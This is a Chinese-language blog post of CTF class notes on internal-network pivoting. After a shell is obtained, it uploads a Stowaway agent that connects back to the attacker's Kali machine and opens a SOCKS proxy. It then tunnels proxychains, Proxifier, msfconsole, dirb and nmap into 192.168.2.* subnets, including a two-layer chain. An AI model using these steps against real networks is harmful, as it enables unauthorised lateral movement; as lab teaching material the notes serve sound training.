CTF-内网穿透

优秀的人,不是不合群,而是他们合群的人里面没有你

内网穿透思路总结

  1. 拿到第一步的shell后,用ip addr查看靶机在内网的网段,或者用netstat,netstat -rn,hostname -i,得到的结果网段192.168.2.10/24,通过这种方法判断是不是有内网要不要转发流量
  2. 靶机切换到tmp目录下上传linux_agent,kali下上传linux_admin,分别都chmod +x
  3. kali下使用linux_admin
  4. 靶机的shell下用linux_agent
  5. win下配置proxifer软件,win下扫描就行

内网穿透

拿到shell,第一步先找flag

然后查看信息

ifconfig

ip addr

我的外网的地址是192.168.65.134,但是可以看到内网地址192.168.2.11

然后用Stowaway做内网穿透,上传linux_x64_agent(是客户端软件)到/var/www/html目录 或 /tmp目录

chomd +x linux_x64_agent

赋予权限

kali下:

将 linux_x64_admin(服务端软件) 放到kali下

chmod +x linux_x64_admin
./linux_x64_admin -l 9632

靶机下:
./linux_x64_agent -c KALI:ip
./linux_x64_agent -c 192.168.65.129:9632

kali下:
use 0
socks 2222
# 这个就是在靶机上进行转发流量

到这里流量转发就部署完成了!

做流量代理继续使用:

kali下

    kali开启一个新的窗口

    nano /etc/proxychains4.conf

    在下面添加一行
    scoks 127.0.0.1 2222

    kali:
    proxychains4 ping 192.168.2.11
    目标:通向192.168.2.11这个网段
    proxychains4 python dirb http://xxxx.com
    proxychains4 msfconsole

win下

配置文件-代理服务器-添加-kali的地址,端口是2222,版本是socks5-确定

配置文件-代理规则-添加-测试1-应用程序(任意)-目标主机(192.168.2.*)-目标端口(任意)-拦截(socks5)-确定

用iisputscan跑着玩

或者重复上面的操作,nmap扫描获取信息继续渗透

课堂笔记

一层代理

拿下第一台机器的shell,上传 linux_x64_agent到 /var/www/html 或 /tmp 目录

chmod +x linux_x64_agent

kali :

上传 linux_x64_admin 到 kali linux 上,chmod +x linux_x64_admin

./linux_x64_admin -l port1

靶机1:

./linux_x64_agent -c kali_ipaddr:port1

kali :

use 0

socks port2

kali :

vim /etc/proxychains4.conf 
在最后一行添加:scoks 127.0.0.1 2222

windows代理工具配置:

配置文件 -> 代理服务器 -> 添加 -> 填写IP地址和端口(IP地址为kali IP,端口为port2)-> 确定 -> 确定

配置文件 -> 代理规则 -> 添加 -> 填写名称、目标主机等(建议目标主机填IP段,如192.168.2.*,目标端口为任意)-> 选择动作为Proxy SOCKS5 

然后就可以直接访问内网了

使用IIS PUT SCANNER进行内网存活主机的主要端口进行探测

二层代理

在tomcat靶机上,查看IP地址,并上传linux_x64_agent chmod +x linux_x64_agent

kali linux_x64_admin:
listen
1
上一层的IP:port3,例如:192.168.2.11:3333

这个IP地址就是第一层里面

tomcat:

./linux_x64_agent -c 192.168.2.11:3333

kali linux_x64_admin:

回车
back
use 1
socks 4444

windows:

配置文件 -> 代理服务器 -> 添加 -> 填写IP地址和端口(IP地址为kali linux,端口为node1 socks 端口)-> 确定 -> 确定

配置代理链:配置文件 -> 代理服务器 -> 代理链 -> 创建 -> 任意命名 -> 将上面的代理地址按照顺序拖拽下来.

配置文件 -> 代理规则 -> 添加 -> 填写名称、目标主机等(建议目标主机填IP段,如192.168.60.*,目标端口为任意)-> 选择动作为Proxy SOCKS5
坚持原创技术分享,您的支持将鼓励我继续创作!

-------------本文结束感谢您的阅读-------------

腾讯云主机优惠打折:最新活动地址


版权声明

LangZi_Blog's by Jy Xie is licensed under a Creative Commons BY-NC-ND 4.0 International License
由浪子LangZi创作并维护的Langzi_Blog's博客采用创作共用保留署名-非商业-禁止演绎4.0国际许可证
本文首发于Langzi_Blog's 博客( http://langzi.fun ),版权所有,侵权必究。

0%